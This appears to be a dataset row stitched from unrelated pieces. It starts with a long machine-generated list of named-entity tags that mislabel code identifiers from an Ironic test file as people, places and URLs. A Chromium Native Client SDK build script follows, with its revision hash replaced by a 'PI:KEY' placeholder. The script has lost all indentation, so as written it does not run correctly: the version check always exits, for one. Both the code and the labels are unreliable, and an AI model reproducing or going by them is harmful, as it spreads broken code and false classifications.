'run_as_root=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(GetDeviceBlockSizeTestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'qemu_img_info'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'mock_qinfo'], ['LOCATION', 'mock_qinfo'], ['LOCATION', 'RealFilePartitioningTestCase(tests_base'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(RealFilePartitioningTestCase'], ['PERSON', 'self.file.close'], ['DATE_TIME', 'zip(part_table'], ['PERSON', 'Fedora'], ['DATE_TIME', 'Fedora 20'], ['LOCATION', 'self.assertEqual([6'], ['PERSON', 'autospec=True'], ['PERSON', 'utils.fetch_images(None'], ['PERSON', 'autospec=True'], ['LOCATION', 'utils.fetch_images'], ['PERSON', 'mock_cache'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'TestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['URL', 'requests.si'], ['LOCATION', 'b64decode'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'VirtualMediaDeployUtilsTestCase(db_base'], ['LOCATION', 'TestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'boot_devices'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', "IPMIFailure(cmd='a"], ['PERSON', 'boot_devices'], ['PERSON', 'autospec=True'], ['PERSON', "IPMIFailure(cmd='a"], ['PERSON', 'boot_devices'], ['PERSON', 'boot_devices'], ['PERSON', 'autospec=True'], ['NRP', 'node_set_boot_device_mock.side_effect'], ['PERSON', 'boot_devices'], ['PERSON', 'boot_devices'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['PERSON', "self.assertEqual('1"], ['LOCATION', 'test_get_clean_steps_missing_steps(self'], ['PERSON', 'autospec=True'], ['LOCATION', 'ISCSISetupAndHandleErrorsTestCase(tests_base'], ['LOCATION', 'TestCase'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.co'], ['URL', 'ironic.co'], ['URL', 'ironic.drivers.mo'], ['URL', 'ironic.drivers.mo'], ['URL', 'ironic.drivers.mo'], ['URL', 'ironic.tests.co'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'patcher.st'], ['URL', 'self.ad'], ['URL', 'patcher.st'], ['URL', 'mock.Ma'], ['URL', 'mock.at'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], 
['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.de'], ['URL', 'mock.as'], ['URL', 'mock.pa'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'mock.si'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'mock.as'], ['URL', 'mock.as'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'uuid.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'size.ca'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'configdrive.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.AN'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'gdi.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 
'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'exec.re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.ve'], ['URL', 'self.as'], ['URL', 'exec.ca'], ['URL', 'mock.pa'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.ch'], ['URL', 'self.as'], ['URL', 'os.ca'], ['URL', 'mock.pa'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'utils.ch'], ['URL', 'os.as'], ['URL', 'mock.pa'], ['URL', 'exec.re'], ['URL', 'utils.ve'], ['URL', 'exec.as'], ['URL', 'mock.pa'], ['URL', 'utils.fo'], ['URL', 'exec.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'exec.re'], ['URL', 'exec.as'], ['URL', 'verify.as'], ['URL', 'update.as'], ['URL', 'dev.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'patcher.st'], ['URL', 'self.ad'], ['URL', 'patcher.st'], ['URL', 'mock.Ma'], ['URL', 'mock.at'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'disk.si'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'self.as'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'tempfile.mk'], ['URL', 'os.cl'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'cfg.CONF.se'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'cfg.CONF.se'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'time.sl'], ['URL', 'utils.mo'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'blk.re'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'blk.as'], ['URL', 'mock.pa'], ['URL', 'os.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.is'], ['URL', 'os.as'], ['URL', 'mock.ca'], ['URL', 'mock.pa'], ['URL', 'os.pa'], ['URL', 'mock.pa'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.node.pro'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.pro'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.pro'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.pro'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.node.pro'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'mock.pa'], ['URL', 'self.im'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.mo'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.ad'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.mo'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.ad'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.mo'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'obj.st'], 
['URL', 'self.ad'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.mo'], ['URL', 'mp.re'], ['URL', 'self.ro'], ['URL', 'self.mo'], ['URL', 'ibd.re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.mo'], ['URL', 'ibd.as'], ['URL', 'self.ro'], ['URL', 'self.mo'], ['URL', 'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.mo'], ['URL', 'ibd.si'], ['URL', 'mock.ca'], ['URL', 'self.ro'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'ibd.ca'], ['URL', 'self.mo'], ['URL', 'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.mo'], ['URL', 'mp.re'], ['URL', 'self.mo'], ['URL', 'ibd.si'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'ibd.ca'], ['URL', 'self.mo'], ['URL', 'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'mp.re'], ['URL', 'self.mo'], ['URL', 'ibd.si'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.mo'], ['URL', 'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.pa'], ['URL', 'self.de'], ['URL', 'exc.re'], ['URL', 'utils.ma'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.pa'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'exc.as'], ['URL', 'self.pa'], ['URL', 'exc.re'], ['URL', 'utils.ma'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'mock.ca'], ['URL', 'exc.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'gz.re'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'utils.de'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.as'], ['URL', 'self.as'], ['URL', 'gz.ca'], ['URL', 'gz.si'], ['URL', 'processutils.Pro'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'processutils.Pro'], ['URL', 'utils.de'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.as'], ['URL', 'exec.si'], ['URL', 'processutils.Pro'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'processutils.Pro'], ['URL', 'utils.de'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.as'], ['URL', 'self.as'], ['URL', 'gz.ca'], ['URL', 'mock.pa'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.re'], ['URL', 'mock.ca'], ['URL', 'self.de'], ['URL', 'utils.ge'], ['URL', 'self.de'], ['URL', 'exec.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'qinfo.re'], ['URL', 'mock.Pro'], ['URL', 'dd.as'], ['URL', 'self.as'], ['URL', 'cg.ca'], ['URL', 'qinfo.re'], ['URL', 'mock.Pro'], ['URL', 'cg.as'], ['URL', 'self.as'], ['URL', 'dd.ca'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'self.sk'], ['URL', 'self.fi'], ['URL', 'tempfile.Na'], ['URL', 'self.file.cl'], ['URL', 'self.file.na'], ['URL', 'mock.pa'], ['URL', 'self.file.na'], ['URL', 'partitioner.li'], ['URL', 'self.file.na'], ['URL', 'self.as'], ['URL', 'self.file.na'], ['URL', 'partitioner.li'], ['URL', 'self.file.na'], ['URL', 'self.as'], ['URL', 'self.as'], 
['URL', 'mock.pa'], ['URL', 'mock.Ma'], ['URL', 'caches.as'], ['URL', 'image.as'], ['URL', 'mock.pa'], ['URL', 'exception.In'], ['URL', 'mock.Ma'], ['URL', 'caches.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'caches.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'requests.re'], ['URL', 'mock.Ma'], ['URL', 'requests.as'], ['URL', 'gzip.as'], ['URL', 'mock.AN'], ['URL', 'copy.as'], ['URL', 'mock.AN'], ['URL', 'mock.AN'], ['URL', 'mock.pa'], ['URL', 'self.as'], ['URL', 'requests.ca'], ['URL', 'gzip.as'], ['URL', 'mock.AN'], ['URL', 'copy.as'], ['URL', 'mock.AN'], ['URL', 'mock.AN'], ['URL', 'requests.exceptions.Re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.as'], ['URL', 'copy.ca'], ['URL', 'mock.pa'], ['URL', 'b64.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'b64.as'], ['URL', 'self.as'], ['URL', 'copy.ca'], ['URL', 'mock.pa'], ['URL', 'requests.re'], ['URL', 'mock.Ma'], ['URL', 'copy.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'requests.as'], ['URL', 'gzip.as'], ['URL', 'mock.AN'], ['URL', 'copy.as'], ['URL', 'mock.AN'], ['URL', 'mock.AN'], ['URL', 'utils.mo'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'self.node.id'], ['URL', 'uuidutils.ge'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'self.no'], ['URL', 'utils.ge'], ['URL', 'self.co'], ['URL', 'self.node.in'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'self.no'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'self.no'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'self.no'], ['URL', 'self.node.pro'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'utils.mo'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'self.node.pro'], ['URL', 'self.node.sa'], ['URL', 'mock.si'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'mock.warning.as'], ['URL', 'mock.AN'], ['URL', 'mock.pa'], ['URL', 'mock.si'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'mock.pa'], ['URL', 'exception.Il'], ['URL', 'mock.si'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'exception.Il'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'utils.mo'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'self.node.id'], ['URL', 'self.cl'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'self.cl'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'mock.as'], ['URL', 'mock.AN'], ['URL', 
'task.no'], ['URL', 'self.as'], ['URL', 'task.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'self.cl'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'self.cl'], ['URL', 'mock.re'], ['URL', 'self.cl'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'exception.No'], ['URL', 'utils.ag'], ['URL', 'mock.as'], ['URL', 'mock.AN'], ['URL', 'task.no'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'states.CL'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'states.CL'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'states.CL'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'ibd.re'], ['URL', 'exception.In'], ['URL', 'self.as'], ['URL', 'ibd.as'], ['URL', 'ibd.re'], ['URL', 'self.as'], ['URL', 'ibd.as']] |
34 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Entry point for both build and try bots.
This script is invoked from XXX, usually without arguments
to package an SDK. It automatically determines whether
this SDK is for mac, win, or linux.
The script inspects the following environment variables:
BUILDBOT_BUILDERNAME to determine whether the script is run locally
and whether it should upload an SDK to file storage (GSTORE)
"""
# pylint: disable=W0621
# std python includes
import argparse
import datetime
import glob
import os
import re
import sys
if sys.version_info < (2, 7, 0):
  sys.stderr.write("python 2.7 or later is required to run this script\n")
sys.exit(1)
# local includes
import buildbot_common
import build_projects
import build_updater
import build_version
import generate_notice
import manifest_util
import parse_dsc
import verify_filelist
from build_paths import SCRIPT_DIR, SDK_SRC_DIR, SRC_DIR, NACL_DIR, OUT_DIR
from build_paths import NACLPORTS_DIR, GSTORE, GONACL_APPENGINE_SRC_DIR
# Add SDK make tools scripts to the python path.
sys.path.append(os.path.join(SDK_SRC_DIR, 'tools'))
sys.path.append(os.path.join(NACL_DIR, 'build'))
import getos
import oshelpers
BUILD_DIR = os.path.join(NACL_DIR, 'build')
NACL_TOOLCHAIN_DIR = os.path.join(NACL_DIR, 'toolchain')
NACL_TOOLCHAINTARS_DIR = os.path.join(NACL_TOOLCHAIN_DIR, '.tars')
CYGTAR = os.path.join(BUILD_DIR, 'cygtar.py')
PKGVER = os.path.join(BUILD_DIR, 'package_version', 'package_version.py')
NACLPORTS_URL = 'https://chromium.googlesource.com/external/naclports.git'
NACLPORTS_REV = 'PI:KEY'
GYPBUILD_DIR = 'gypbuild'
options = None
# Map of: ToolchainName: (PackageName, SDKDir, arch).
TOOLCHAIN_PACKAGE_MAP = {
'arm_glibc': ('nacl_arm_glibc', '%(platform)s_arm_glibc', 'arm'),
'x86_glibc': ('nacl_x86_glibc', '%(platform)s_x86_glibc', 'x86'),
'pnacl': ('pnacl_newlib', '%(platform)s_pnacl', 'pnacl')
}
def GetToolchainDirName(tcname):
"""Return the directory name for a given toolchain"""
return TOOLCHAIN_PACKAGE_MAP[tcname][1] % {'platform': getos.GetPlatform()}
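# For example, on linux GetToolchainDirName('pnacl') returns 'linux_pnacl'
# and GetToolchainDirName('arm_glibc') returns 'linux_arm_glibc', per the
# TOOLCHAIN_PACKAGE_MAP above.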
def GetToolchainDir(pepperdir, tcname):
"""Return the full path to a given toolchain within a given sdk root"""
return os.path.join(pepperdir, 'toolchain', GetToolchainDirName(tcname))
def GetToolchainLibc(tcname):
if tcname == 'pnacl':
return 'newlib'
for libc in ('glibc', 'newlib', 'host'):
if libc in tcname:
return libc
def GetToolchainNaClInclude(pepperdir, tcname, arch=None):
tcpath = GetToolchainDir(pepperdir, tcname)
if arch is None:
arch = TOOLCHAIN_PACKAGE_MAP[tcname][2]
if arch == 'x86':
return os.path.join(tcpath, 'x86_64-nacl', 'include')
elif arch == 'pnacl':
return os.path.join(tcpath, 'le32-nacl', 'include')
elif arch == 'arm':
return os.path.join(tcpath, 'arm-nacl', 'include')
else:
buildbot_common.ErrorExit('Unknown architecture: %s' % arch)
def GetConfigDir(arch):
if arch.endswith('x64') and getos.GetPlatform() == 'win':
return 'Release_x64'
else:
return 'Release'
def GetNinjaOutDir(arch):
return os.path.join(OUT_DIR, GYPBUILD_DIR + '-' + arch, GetConfigDir(arch))
def GetGypBuiltLib(tcname, arch):
if arch == 'ia32':
lib_suffix = '32'
elif arch == 'x64':
lib_suffix = '64'
elif arch == 'arm':
lib_suffix = 'arm'
else:
lib_suffix = ''
tcdir = 'tc_' + GetToolchainLibc(tcname)
if tcname == 'pnacl':
if arch is None:
lib_suffix = ''
tcdir = 'tc_pnacl_newlib'
arch = 'x64'
else:
arch = 'clang-' + arch
return os.path.join(GetNinjaOutDir(arch), 'gen', tcdir, 'lib' + lib_suffix)
def GetToolchainNaClLib(tcname, tcpath, arch):
if arch == 'ia32':
return os.path.join(tcpath, 'x86_64-nacl', 'lib32')
elif arch == 'x64':
return os.path.join(tcpath, 'x86_64-nacl', 'lib')
elif arch == 'arm':
return os.path.join(tcpath, 'arm-nacl', 'lib')
elif tcname == 'pnacl':
return os.path.join(tcpath, 'le32-nacl', 'lib')
def GetOutputToolchainLib(pepperdir, tcname, arch):
tcpath = os.path.join(pepperdir, 'toolchain', GetToolchainDirName(tcname))
return GetToolchainNaClLib(tcname, tcpath, arch)
def GetPNaClTranslatorLib(tcpath, arch):
if arch not in ['arm', 'x86-32', 'x86-64']:
buildbot_common.ErrorExit('Unknown architecture %s.' % arch)
return os.path.join(tcpath, 'translator', arch, 'lib')
def BuildStepDownloadToolchains(toolchains):
buildbot_common.BuildStep('Running package_version.py')
args = [sys.executable, PKGVER, '--mode', 'nacl_core_sdk']
args.extend(['sync', '--extract'])
buildbot_common.Run(args, cwd=NACL_DIR)
def BuildStepCleanPepperDirs(pepperdir, pepperdir_old):
buildbot_common.BuildStep('Clean Pepper Dirs')
dirs_to_remove = (
pepperdir,
pepperdir_old,
os.path.join(OUT_DIR, 'arm_trusted')
)
for dirname in dirs_to_remove:
if os.path.exists(dirname):
buildbot_common.RemoveDir(dirname)
buildbot_common.MakeDir(pepperdir)
